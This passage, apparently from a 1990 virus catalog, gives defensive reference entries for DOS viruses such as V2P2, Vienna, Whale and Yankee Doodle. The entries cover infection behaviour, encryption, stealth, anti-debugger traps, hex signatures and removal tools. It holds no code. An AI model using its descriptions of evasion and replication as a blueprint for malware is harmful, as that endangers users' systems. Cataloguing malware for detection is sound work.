Instructions: Scan/D/X, or delete infected files General Comments: The V2P2 Virus is a research virus written by Mark Washburn and distributed to some anti-viral program authors in June of 1990. This virus, according to its author, has not been released. This virus is a non-resident generic infector of .COM files. When a program infected with the V2P2 virus is executed, it will infect the first .COM file it finds in the current directory which is not infected with the virus. The virus adds its code to the end of the file, and the infected file's length will increase between 1,426 and 2,157 bytes. Like the 1260 virus, this virus uses a complex encryption method. In fact, the encryption used with the 1260 virus is one of several possible encryptions that V2P2 may produce. As a result, virus scanning software will often identify the 1260 virus in a file as being both 1260 and V2P2. This identification is entirely valid as 1260 is a special case of V2P2. Also see: 1260, V2P6, V2P6Z Virus Name: V2P6 Aliases: V Status: Research Discovered: July, 1990 Symptoms: .COM file growth Origin: Minnesota, USA Eff Length: 1,946 - 2,111 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D/X, or delete infected files General Comments: The V2P6 Virus is a research virus written by Mark Washburn and distributed to some anti-viral program authors in July of 1990. This virus, according to its author, has not been released. This virus is a non-resident generic infector of .COM files similar to the 1260, V2P2, and V2P6Z viruses. When a program infected with the V2P6 virus is executed, it will infect the first .COM file it finds in the current directory which is not infected with the virus. The virus adds its code to the end of the file, and the infected file's length will increase between 1,946 and 2,111 bytes. Like the 1260 and other viruses by Mark Washburn, this virus uses a complex encryption method. The encryption method used by V2P6 is more complex than that used in V2P2, but less complex than that used in the last known virus in this family, V2P6Z. Like V2P2, an algorithmic approach must be used to identify this virus. Also see: 1260, V2P2, V2P6Z Virus Name: V2P6Z Aliases: V Status: Research Discovered: August, 1990 Symptoms: .COM file growth Origin: Minnesota, USA Eff Length: 2,076 - 2,364 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: Removal Instructions: Delete infected files General Comments: The V2P6Z Virus is a research virus written by Mark Washburn and distributed to some anti-viral program authors in August, 1990. This virus, according to its author, has not been released. This virus is a non-resident generic infector of .COM files similar to the 1260, V2P2, and V2P6 viruses. When a program infected with the V2P6Z virus is executed, it will infect the first .COM file it finds in the current directory which is not infected with the virus. The virus adds its code to the end of the file, and the infected file's length will increase between 2,076 and 2,364 bytes. Like the 1260 and other viruses by Mark Washburn, this virus uses a complex encryption method. The encryption method used by V2P6Z is the most complex of the encryption methods employed by the viruses in this family of viruses. Like V2P2 and V2P6, an algorithmic approach must be used to identify this virus as there is no possible identification string within the encrypted viral code. Also see: 1260, V2P2, V2P6 Virus Name: Vacsina Aliases: V Status: Endangered Discovered: November, 1989 Symptoms: TSR; .COM, .EXE, .BIN, & .SYS growth; "beeps" Origin: Bulgaria Eff Length: 1,206 bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan, F-Prot, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp V64+, Scan/D/A, F-Prot, VirHunt 2.0+, or delete infected files General Comments: The Vacsina virus is approximately 1200 bytes in length and can be found in memory on infected systems. There are at least 48 variants of the Vacsina virus, also known as the TP virus family, though not all of them have been isolated. Later versions of this virus are included in this listing under the name "Yankee Doodle". Generally, the Vacsina Virus infects both .COM and .EXE files, as well as .SYS and .BIN files. This virus, when infecting a .EXE file, will first convert it into .COM format by changing the MZ or ZM identifier in the first two bytes of the file to a JMP instruction and then adding a small piece of relocator code, so that the .EXE file can be infected as though it were originally a .COM file. One sign of a Vacsina infection is that programs which have been infected may "beep" when executed. Infected programs will also have their date/time in the disk directory changed to the date and time they were infected. Known Vacsina Variants Include: TP04VIR - Infects .EXE files, changing them internally into .COM files. Infected programs may beep when executed, and may be identified by searching for the text string "VACSINA" along with the second byte from the end of the file containing a 04h. This version of Vacsina is a poor replicator, and while it will always convert a .EXE file to .COM file format, adding 132 bytes, it does not always infect executed files. TP05VIR - Similar to TP04VIR, except that the second to the last byte in the file is now a 05h. System hangs may also be experienced. TP06VIR - Similar to TP05VIR, except the second to the last byte in the file is now a 06h. TP16VIR - Similar to TP06VIR, the second to the last byte in the infected file is now 10h. TP23VIR - Similar to TP16VIR, the second to the last byte in the infected file is now 17h. The text "VACSINA" no longer appears in the virus. TP24VIR - Similar to TP23VIR, the second to the last byte in the infected file is now 18h. TP25VIR - Similar to TP24VIR, the second to the last byte in the infected file is now 19h. Also see: Yankee Doodle Virus Name: VComm Aliases: 637 V Status: Rare Discovered: December, 1989 Symptoms: .EXE growth, TSR, write failures Origin: Poland Eff Length: 637 Bytes Type Code: PRaE - Parasitic Resident .EXE Infector Detection Method: F-Prot, ViruScan V60+, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: F-Prot, Scan/D, VirexPC, or delete infected files General Comments: The Vcomm virus is of Polish origin, first isolated in December, 1989. The virus is a .EXE file infector. When an infected file is run, the virus will attempt to infect one .EXE file in the current directory. It will also infect the memory resident version of the system's command interpreter. When Vcomm infects a file, it first pads the file so that the files length is a multiple of 512 bytes, then it adds its 637 bytes of virus code to the end of the file. The memory resident portion of the virus intercepts any disk writes that are attempted, and changes them into disk reads. Virus Name: VFSI Aliases: 437, Happy Day V Status: Rare Discovered: September, 1990 Symptoms: .COM growth; message Origin: Bulgaria Eff Length: 437 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files General Comments: The VFSI Virus was isolated in September, 1990 at VFSI (the Higher Institute of Financial Management) located in Svistov, a town on the Danube. VFSI is a non-resident, direct action, infector of .COM files, including COMMAND.COM. When a program infected with the VFSI virus is executed, it will infect one other .COM file located in the current directory. Candidate files to be infected are first aligned to be a multiple of 16, and then the viral code is added. Infected files will increase in length by between 437 and 452 bytes, with the viral code being located at the end of infected files. Infected files can be easily identified as they will always contain the following hex string: 3A483F244B6F636E706C74. On approximately one out of five executions of an infected program, the program will flash the following message on the screen: "HELLO!!! HAPPY DAY and SUCCESS from virus 1.1 VFSI-Svistov" This message is encrypted in the viral code, so it is not visible in infected files. Virus Name: VHP Aliases: VHP-348, VHP-353, VHP-367, VHP-435 V Status: Research Discovered: July 1989 Symptoms: .COM growth, system hangs Origin: Bulgaria Eff Length: 348 - 435 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V64+, AVTK 3.5+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files General Comments: The VHP Virus is actually a small group or "family" of viruses that was discovered in Bulgaria in early 1990. There are currently four identified variants to the VHP Virus, with the VHP-435 variant being the one with the most potential for spreading. These viruses were originally based on the Vienna virus. The progression of the variants shows each variant to be a slightly better replicator. The VHP Viruses are: VHP-348 : This variant does not replicate due to bugs in the virus code. If it did replicate, it would infect .COM files. The virus's effective length is 348 bytes. VHP-353 : VHP-348 fixed so that it will infected COMMAND.COM, increasing its size by 353 bytes. It does not infect other .COM files. This variant is still buggy, and it will occasionally hang systems when attempting to find a .COM file to infect. VHP-367 : VHP-353 which will now infect .COM files besides COMMAND.COM. Infected files increase in size by 367 bytes. Very rarely, this virus will reinfect an infected .COM file. VHP-353 does not always infect a .COM file when an infected program is executed, it will sometimes not infect any .COM file, though it has in effect immunized the file from infection. This effect is probably a bug in this variant. VHP-435 : Isolated in July, 1989, this variant is 435 bytes in length and is not destructive, all it does is spread. VHP-435 will attempt to infect 1 file each time an infected program is executed. COMMAND.COM and .EXE files are not infected. After infecting all of the .COM files on the current drive and directory, it will attempt to infect drive C:. VHP-435 is the VHP-367 virus with some modifications to make it less likely to be noticed. Also see: Vienna, VHP2 Virus Name: VHP2 Aliases: 623, VHP-623 V Status: Research Discovered: March, 1990 Symptoms: .COM growth, reboots or system hangs Origin: Bulgaria Eff Length: 623 bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V64+, Pro-Scan 1.4+, AVTK 3.5+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 1.4+, F-Prot 1.12+, or Delete infected files General Comments: The VHP2 Virus was isolated in Bulgaria in March, 1990. This virus is based on the Vienna Virus, and has many of the same characteristics of the VHP-435 variant of the VHP virus. It's major difference is that of effective length, and that 1 of every 8 infected programs will perform a system warm reboot. VHP2 is 623 bytes long, infecting only .COM files but not COMMAND.COM. Known variants of the Vienna Virus include: VHP-627 : Similar to VHP-623, except that its length is 627 bytes. Also see: VHP, Vienna Virus Name: Victor Aliases: V Status: Rare Discovered: May, 1990 Symptoms: .COM &.EXE growth, data file corruption, file linkage errors, and unexpected system reboots Origin: USSR Eff Length: 2,458 bytes Type Code: PRAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+ Removal Instructions: Scan/D, Pro-Scan 1.4+, F-Prot 1.12+, or Delete infected files General Comments: The Victor Virus was first isolated in May, 1990. It is believed to have originated in the USSR due to messages which appear within the viral code: "Victor V1.0 The Incredible High Performance Virus Enhanced versions available soon. This program was imported from USSR. Thanks to Ivan." The above message can be found at the end of infected files, but does not appear to ever be displayed. The first time a program infected with the Victor Virus is executed, the virus will install itself memory resident, occupying 3,072 bytes at the top of free memory. Interrupt 21 will be intercepted by the virus. After becoming memory resident, Victor will then seek out and infect COMMAND.COM. Victor is a very slow file infector, only infected approximately 1 in every 10 programs executed after it becomes memory resident. Infected programs will increase in length by between 2,443 and 2,458 bytes. The increase in file size is not hidden by the virus. Occasionally in the process of infecting a file, the virus will hang the system, which may result in data file corruption. Overlay files may also be infected, resulting in file linkage errors. Virus Name: Vienna Aliases: Austrian, Unesco, DOS-62, DOS-68, 1-in-8, 648 V Status: Endangered Discovered: April, 1988 Symptoms: .COM growth, reboots or system hangs Origin: Austria Eff Length: 648 bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp V66+, VirClean, F-Prot, VirHunt 2.0+, Pro-Scan 1.4+, or VirexPC General Comments: The Vienna virus was first isolated in April, 1988, in Moscow at a UNESCO children's computer summer camp. The virus will infect 1 .COM file whenever a program infected with the virus is run. 1 in every 8 infected programs will perform a system warm reboot whenever the viral code is executed. Some .COM programs infected with this virus may not run. The Vienna virus was written by a high school student in Vienna Austria as an experiment. Its large number of variants can be accounted for as its source code has been published many times. Known variants of the Vienna Virus include: Vienna-B : Similar to Vienna, except that instead of a warm reboot, the program being executed will be deleted. Vienna-B 645 : Similar to the Vienna-B variant, this variant's effective length is 645 bytes. It does not perform either a warm reboot or delete executed programs. It does, however, infect COMMAND.COM Origin: United States Vien6 : Similar to Vienna, except that the warm reboot has been removed. Effective length of the virus is still 648 bytes. After 7 files have become infected on the current drive, the virus will then start infecting .COM files on drive C:. Also see: 1260, Ghostballs, Lisbon, W13, VHP, VHP-2 Virus Name: Violator Aliases: Violator Strain B V Status: Endangered Discovered: August, 1990 Symptoms: .COM growth, Sector not found error on drive B: Origin: USA Eff Length: 1,055 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V71+, Scan/D, or Delete infected files General Comments: The Violator Virus was submitted in August, 1990 by an anonymous user of Homebase BBS. This virus is a non-resident parasitic virus which infects .COM files, including COMMAND.COM. When a program infected with the Violator Virus is executed, what happens depends on what the system date is set to. If the date is prior to August 15, 1990, the virus will infect 1 .COM file located in the current directory, adding 1,055 bytes to the program. If the date is August 15, 1990 or after, the virus will not infect any files. Symptoms of an infection of the Violator Virus include unexpected attempts to access drive B:. If there is no diskette in drive B:, or the diskette in drive B: is write-protected, a Sector not found error will result. The following message appears in the viral code located in infected programs: "TransMogrified (TM) 1990 by RABID N'tnl Development Corp Copyright © 1990 RABID! Activation Date: 08/15/90 - Violator Strain B - ! (Field Demo Test Version) ! ! * NOT TO BE DISTRIBUTED * !" Virus Name: Violator B4 Aliases: Christmas Violator, Violator Strain B4 V Status: New Discovered: December, 1990 Symptoms: .COM growth on 8088 based system; Hard Disk Corruption on 80286 & 80386 based systems Origin: United States Eff Length: 5,302 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Violator B4 Virus was isolated in December, 1990 in the United States. This virus was originally released into the public domain on a trojan version of DSZ (DSZ1203). It is a non-resident infector of .COM files, including COMMAND.COM. What Violator B4 does depends on what processor is in the personal computer it is being executed on. On 80286 and above processors, the virus will activate immediately, overwriting the beginning portion of the system hard disk. It will also attempt to display a Christmas greeting at that time, but the greeting display will be garbled if Ansi.Sys is not loaded. Damage caused by Violator B4 at activation can be repaired using Norton Disk Doctor. On an 8088 based system, Violator B4 will do nothing but replicate. Each time an infected program is executed, the virus will infect one other .COM program in the current directory. Violator B4 infected files will have a file length increase of 5,302 bytes. The file's date and time in the disk directory will not be altered. The virus will be located at the end of the infected file. The following text message is contained within the Violator B4 virus, though it is never displayed: "Violator Strain B4 - Written by RABID Nat'nl Development Corp. RABID would like to take this opportunity to extend it's sincerest holiday wishes to all Pir8 lamers around the world! If you are reading this, then you are lame!!! Anyway, to John McAffe! Have a Merry Christmas and a virus filled new year. Go ahead! Make our day! Remember! In the festive season, Say No to drugs!!! They suck shit! (Bah! We make a virus this large, might as well have something positive!)" Virus Name: VirDem Aliases: VirDem 2 V Status: Endangered Discovered: 1986-1987 Symptoms: .COM growth, Messages Origin: Germany Eff Length: 1,236 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: VirexPC, AVTK 3.5+, F-Prot 1.12+, ViruScan V71+, VirHunt 2.0+, Pro-Scan 2.01+ Removal Instructions: F-Prot 1.12+, Scan/D, or Delete infected files General Comments: The VirDem Virus was written in 1986-1987 by Ralf Burger of Germany. The virus was originally distributed in Europe as a demonstration virus, to assist computer users in understanding how a computer virus operates. The VirDem virus is not memory resident, and only infects .COM files on the A: drive. It will always skip the first .COM file in the root directory, so normally it will not infect COMMAND.COM. It will also not infect .COM files past the second subdirectory on the disk. Infected files that were originally less than approximately 1,500 bytes will be 2,616 bytes after infection. .COM files which were greater than 1,500 bytes will increase in size by approximately 1,236 bytes. When an infected program is executed, VirDem will infect the next candidate .COM file. Infected files will contain the viral code, followed by the original program. After infecting the .COM file, the virus will play a "game" with you, starting with the following text being displayed: " VirDem Ver.: 1.06 (Generation #) aktive. Copyright by R.Burger 1986,1987 Phone.: D - xxxxx/xxxx This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and # " (Note: I have removed the phone number here, but it appears where xxxxx/xxxx is above. Where # is, the virus's generation number appears.) At this point, you must guess the correct number and enter it. If you put in the wrong number, you get the following message and your program is not run: " Sorry, you're wrong More luck at next try .... " If you guess the correct number, you receive the following message and your program then executes: " Famous. You're right. You'll be able to continue. " Finally, after all the candidate .COM files on the A: drive are infected, the following message is displayed: " All your programs are struck by VIRDEM.COM now." VIRDEM.COM was the original distribution file containing the virus, and had a VIRDEM.DOC file included with it. VirDem is not widespread, and is not destructive. Known variant(s) of VirDem include: VirDem 2 : Similar to the virus described above, the major difference is that the text messages have been translated to German. Also see: Burger Virus Name: Virus-90 Aliases: V Status: Research Discovered: December, 1989 Symptoms: .COM growth, TSR Origin: District of Columbia, USA Eff Length: 857 bytes Type Code: PRC - Parasitic Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC, AVTK 3.5+ Removal Instructions: Scan/D/X, F-Prot, Pro-Scan 1.4+, or delete infected files General Comments: The Virus-90 virus was originally distributed in December, 1989 by Patrick Toulme as an "educational tool", with the virus source also available for sale. In January, 1990, the author contacted the sites where he had uploaded the virus requesting that they remove it from their systems, his having decided a live virus was not a "good idea" for an educational tool after being contacted by several viral authorities. The following description was submitted by Patrick Toulme in November 1990 for inclusion in this listing: "This educational, research virus was written by Patrick Toulme to aid developers in understanding direct-virus action and in creating virus-resistant software. This virus is a simple COM infector that will not infect a hard drive and advises the user when a file on a floppy disk is to be infected. Of course, no damage occurs from the virus and all infected files advise the user of the infection upon execution. The safeguards provided by the author prevent accidental infection and the dis-assembly of the code is extremely difficult. Upon request from the anti-viral community, Virus-90 is now only available to approved anti-virus researchers." Also see: Virus101 Virus Name: Virus101 Aliases: V Status: Research Discovered: January, 1990 Symptoms: TSR, BSC, .COM growth (floppy only) Origin: District of Columbia, USA Eff Length: 2,560 Bytes Type Code: PRAFK - Parasitic Resident Infector Detection Method: ViruScan/X V67+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D/X or delete infected files General Comments: The Virus101 is the "big brother" of Virus-90, also written by Patrick Toulme as an "educational tool" in January 1990. This virus is memory resident, and employs an encryption scheme to avoid detection on files. It infects COMMAND.COM, and all other executable file types. Once it has infected all the files on a diskette, it will infect the diskette's boot sector. It only infects floppy diskettes in its current version. The following description was submitted by Patrick Toulme for inclusion in this listing in November 1990: "Virus-101 is a sophisticated, continually encrypting, research virus written by Patrick Toulme, author of Virus-90. Virus-101 infects both COM and EXE files and will evade most anti-virus software and will continually encrypt itself to prevent non-algorithmic search scans. This virus is not available to the general public and is presently used by government agencies and corporate security departments to test anti-virus software and hardware devices." Also see: Virus-90 Virus Name: Voronezh Aliases: V Status: Rare Discovered: December 1990 Symptoms: .COM & .EXE growth; decrease in total system and available memory Origin: USSR Eff Length: 1,600 Bytes Type Code: PRhA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Voronezh Virus was received in December, 1990. It is originally from the USSR. Voronezh is a memory resident infector of .COM and .EXE files, and does not infect COMMAND.COM. The first time a program infected with Voronezh is executed the virus will install itself memory resident. This virus will be resident at the top of system memory but below the 640K DOS boundary. While the virus reserves 3,744 bytes of memory for itself, it does not move the interrupt 12 return. Interrupt 21 will be hooked by the virus. This virus may also reserve 24 bytes of display memory on the display adapter card. After Voronezh is memory resident, .COM and .EXE files will be infected when they are executed. Infected files will increase in length by 1,600 bytes, the virus will be located at the end of infected programs. Infected programs will also contain the text string: "Voronezh,1990 2.01". It is unknown if this virus does anything besides replicate. Known variant(s) of Voronezh are: Voronezh B: Similar to the Voronezh Virus described above, the major difference with Voronezh B is that Voronezh B will infect files when they are executed or openned for any reason. The original virus did not infect on file open. The text string indicated for Voronezh is also found in this variant. Virus Name: VP Aliases: V Status: Rare Discovered: May 1990 Symptoms: COMMAND.COM & .COM file growth, system slowdown Origin: England Eff Length: 913 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V64+, Pro-Scan 1.4+, AVTK 3.5+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+, or Delete infected files General Comments: The VP Virus was first isolated in May, 1990. It is a non-resident generic .COM infector, and will infect COMMAND.COM. When an infected program is run, the virus will attempt to locate and infect another .COM file. In some cases, such as COMMAND.COM, the virus will display the contents of the program being infected. In other cases, the virus may attempt to execute the program being infected. Infected files increase in length by 913 bytes, and can be identified as the following hex string will appear near both the beginning and the end of an infected program: '4503EB1808655650'. Virus Name: W13 Aliases: Toothless Virus, W13-A V Status: Endangered Discovered: December, 1989 Symptoms: .COM growth Origin: Poland Eff Length: 534 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V63+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+ or delete infected files General Comments: The W13 virus is a .COM file infector that doesn't do much except for infect files. The virus was isolated in December 1989 in Poland. While W13 is based on the Vienna virus, it does not damage files or have some of the other side effects of the Vienna virus. It contains a number of bugs which prevent it from being a good replicator. Known variant(s) of W13 include: W13-B : The original W13 Virus with several bugs fixed. This variants length is 507 bytes instead of 534 bytes. Virus Name: Westwood Aliases: V Status: Rare Discovered: August, 1990 Symptoms: .COM & .EXE growth; TSR; system slowdown; black window; file deletion on Friday The 13ths Origin: Westwood, California, USA Eff Length: 1,819 - 1,829 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Westwood Virus was isolated in August, 1990 in Westwood, California. This virus is a substantially altered variant of the Jerusalem B virus, enough so that all anti-virals tested which could detect Jerusalem B were unable to identify it. Like Jerusalem, it infects .COM, .EXE, and overlay files, but not COMMAND.COM. The first time a program infected with the Westwood virus is executed, the virus will install itself memory resident as a low system memory TSR of 1,808 bytes. Interrupts 8 and 21 will be hooked. If the system date happens to be a Friday The 13th, interrupt 22 will also be hooked. After the virus is memory resident, any program which is executed will become infected with the Westwood virus. .COM files will increase by 1,829 bytes with the virus's code located at the beginning of the infected program. .EXE files and overlay files are infected with the virus's code added to the end of the program. .EXE files increase in length by between 1,819 and 1,829 bytes. Unlike most variants of the Jerusalem virus, Westwood does not reinfect .EXE files. Infected systems will experience a system slowdown occurring after the virus has been memory resident for 30 minutes. At this time, the "black window" or "black box" common to the Jerusalem virus will appear on the lower left hand side of the system display. Screen contain around the area of the "box" may be corrupted if screen writes happened to be occurring when the box appeared. On Friday The 13ths, the Westwood Virus will delete any programs that are executed once the virus becomes memory resident. Also see: Jerusalem B Virus Name: Whale Aliases: Mother Fish, Stealth Virus, Z The Whale V Status: Research Discovered: August, 1990 Symptoms: .COM & .EXE growth; decrease in available memory; system slowdown; video flicker; slow screen writes; file allocation errors; simulated system reboot Origin: Hamburg, West Germany Eff Length: 9,216 Bytes Type Code: PRhA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, CleanUp V67+, Pro-Scan 2.01+, or Delete infected files General Comments: The Whale Virus was submitted in early September, 1990. This virus had been rumored to exist since the isolation of the Fish 6 Virus in June, 1990. It has been referred to by several names besides Whale, including Mother Fish and Z The Whale. The origin of this virus is subject to some speculation, though it is probably from Hamburg, West Germany due to a reference within the viral code once it is decrypted. The first time a program infected with the Whale Virus is executed, the Whale will install itself memory resident in high system memory but below the 640K DOS boundary. On the author's XT clone, the virus always starts at address 9D90. Available free memory will be decreased by 9,984 bytes. Most utilities which display memory usage will also indicate a value for total system memory which is 9,984 bytes less than what is actually installed. The following text string can be found in memory on systems infected with the Whale virus: "Z THE WHALE". Immediately upon becoming memory resident, the system user will experience the system slowing down. Noticeable effects of the system slowdown include video flicker to extremely slow screen writes. Some programs may appear to "hang", though they will eventually execute properly in most cases since the "hang" is due to the slowing of the system. When a program is executed with the Whale memory resident, the virus will infect the program. Infected programs increase in length, the actual change in length is usually 9,216 bytes. Note the "usually": this virus does occasionally infect a program with a "mutant" which will be a different length. If the file length increase is exactly 9,216 bytes, the Whale will hide the change in file length when a disk directory command is executed. If the file length of the viral code added to the program is other than 9,216 bytes, the file length displayed with the directory command will either the actual infected file length, or the actual infected file length minus 9,216 bytes. Executing the DOS CHKDSK program on infected systems will result in file allocation errors being reported. If CHKDSK /F is executed, file damage will result. The Whale also alters the program's date/time in the directory when the file is executed, though it is not set to the system date/time of infection. Occasionally, Whale will alter the directory entry for the program it is infecting improperly, resulting in the directory entry becoming invalid. These programs with invalid directory entries will appear when the directory is listed, but some disk utilities will not allow access to the program. In these cases, the directory entry can be fixed with Norton Utilities FD command to reset the file date. The Whale occasionally will change its behavior while it is memory resident. While most of the time it only infects files when executed, there are periods of time when it will infect any file opened for any reason. It will also, at times, disinfect files when they are copied with the DOS copy command, at other times it will not "disinfect on the fly". Occasionally, the Whale Virus will simulate what appears to be a system reboot. While this doesn't always occur, when it does occur the Break key is disabled so that the user cannot exit unexpectedly from the execution of the system's AutoExec.Bat file. If the AutoExec.Bat file contained any software which does file opens of other executable programs, those opened executable programs will be infected at that time if they were not previously infected. Typically, files infected in this manner will increase by 9,216 bytes though it will not be shown in a directory listing. A hidden file may be found in the root directory of drive C: on infected files. This file is not always present, the virus will sometimes remove it, only to recreate it again at a later time. The name of this hidden file is FISH-#9.TBL, it contains an image of the hard disk's partition table along with the following message: "Fish Virus #9 A Whale is no Fish! Mind her Mutant Fish and the hidden Fish Eggs for they are damaging. The sixth Fish mutates only if the Whale is in her Cave." After the discovery of this hidden file, the author of this document made several attempt to have the Fish 6 Virus mutate by introducing it and Whale into a system. Under no circumstances did a mutation of either virus result, the resultant files were infected with both an identifiable Fish 6 infection and a Whale infection. Whale is hostile to debuggers and contains many traps to prevent successful decryption of the virus. One of its "traps" is to lock out the keyboard if it determines a debugger is in use. Virus Name: Wisconsin Aliases: Death To Pascal V Status: Rare Discovered: September, 1990 Symptoms: .COM growth; Message; Write Protect Errors; .PAS files disappear; file date/time changes Origin: Wisconsin, USA Eff Length: 825 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Wisconsin Virus was received in September, 1990. The origin of the sample was Wisconsin, which is where its name came from. It is also reported to have been isolated at about this same time in California. Wisconsin is a non-resident infector of .COM files, but it does not infect COMMAND.COM. When a program infected with the Wisconsin Virus is executed, the virus will alter the date and time of the program being executed to the current system date and time. The Wisconsin Virus will then infect one other .COM file in the current directory. Infected files will increase in length by 825 bytes, with the viral code located at the beginning of the file. If an attempt is made to execute a program infected with the Wisconsin virus from a write-protected diskette, a write protect error will occur. This virus does not intercept this error. Infected programs may display the following message: "Death to Pascal." When this message is displayed, any .PAS files located in the current directory will be deleted. This message cannot be seen in infected files as it is encrypted. Virus Name: Wolfman Aliases: V Status: Rare Discovered: July, 1990 Symptoms: TSR; .COM & .EXE growth Origin: Taiwan Eff Length: 2,064 Bytes Type Code: PRsAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Wolfman Virus was discovered in Taiwan in July, 1990. It is a memory resident generic infector of .COM and .EXE files, including COMMAND.COM. The first time a program infected with the Wolfman Virus is executed, the virus will install itself memory resident as a TSR with 2 blocks of memory reserved. The first block of memory reserved is 68,032 bytes in length, the second block of reserved memory is 4,544 bytes in length. The total 72,640 bytes of memory is in low system memory, and available free memory is decreased by a corresponding amount. The virus hooks interrupts 09, 10, 16, 21, 2F, ED, and F5. Once the virus is memory resident, the virus will infect any .COM or .EXE file which is executed if the pre-infection file length is greater than or equal to 2,064 bytes. Infected files increase in length by 2,064 bytes. .COM files which are infected will have the virus's code located at the beginning of the .COM file, .EXE files will have the virus located at the end. It is unknown when Wolfman activates, or if it is destructive. Virus Name: Yankee Doodle Aliases: TP44VIR, Five O'clock Virus V Status: Common - Europe Discovered: September, 1989 Symptoms: .COM & .EXE growth, melody @ 5 p.m. Origin: Austria or Bulgaria Eff Length: 2,885 or 2,899 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V42+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp V64+, Scan/D, VirClean, F-Prot, or delete infected files General Comments: The Yankee Doodle virus was isolated by Alexander Holy of the North Atlantic Project in Vienna, Austria, on September 30, 1989. It was also isolated in Bulgaria shortly thereafter, where it is known as TP44VIR. This virus is a parasitic virus which infects both .COM and .EXE files, and installs itself memory resident. After installing itself memory resident, it will play Yankee Doodle on the system speaker at 17:00. Infected programs will be increased in length by 2,899 bytes. Other than being disruptive by playing Yankee Doodle, this virus currently does nothing else harmful besides infecting files. As a side note, some variants of the Yankee Doodle Virus will seek out and modify Ping Pong viruses, changing them so that they self- destruct after 100 infections. Known variants of the Yankee Doodle Virus are: TP33VIR - This variant disables interrupts 1 and 3, thus interfering with using debuggers to isolate it. The behavior of the virus also has been changed so that it infected programs will play Yankee Doodle at 5PM. The second to the last byte in infected files is the virus's "version number", in the case of TP33VIR, it is 21h (33 in hex). TP34VIR - Similar to TP33VIR, except that this variant is memory resident, and infects programs as they are executed. The second to the last byte in infected files is 22h. TP38VIR - Similar to TP34VIR, except that .COM and .EXE files are handled in a different way, and this variant will disinfect itself if it is loaded with CodeView active in memory. The second to the last byte in infected files is 26h. TP38VIR was first isolated in Bulgaria in July 1988, and is the oldest virus known in Bulgaria. TP41VIR - Similar to TP38VIR, except the second to the last byte in infected files is 29h. TP42VIR - This variant of Vacsina tests to determine if the system is infected with the Ping Pong virus, and if it is, will attempt to disable the Ping Pong virus by modifying it. The second to the last byte in infected files is now 2Ah. TP44VIR - Similar to TP42VIR, the second to the last byte of infected files is 2Ch. TP45VIR - Similar to TP44VIR, the second to the last byte of infected files is 2Dh. TP46VIR - Similar to TP45VIR, except that this variant can detect and kill the Cascade (1701) Virus. The second to the last byte of infected files is now 2Eh. Yankee Doodle-B: Very similar to the Yankee Doodle virus, except the length of the viral code is 2,772 bytes. Also see: Vacsina Virus Name: Yankee 2 Aliases: Yankee Virus, Yankee-go-Home, 1961 V Status: Endangered Discovered: September, 1989 Symptoms: .EXE growth, Yankee Doodle Origin: Bulgaria Eff Length: 1,961 Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: ViruScan V62+, Virex PC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, or delete infected files General Comments: The Yankee 2, or Yankee Virus, was isolated in Bulgaria in 1989. Unlike the Yankee Doodle Virus, the Yankee 2 Virus is not memory resident. It also only infects .EXE files, adding 1,961 bytes to their length. The virus will attempt to 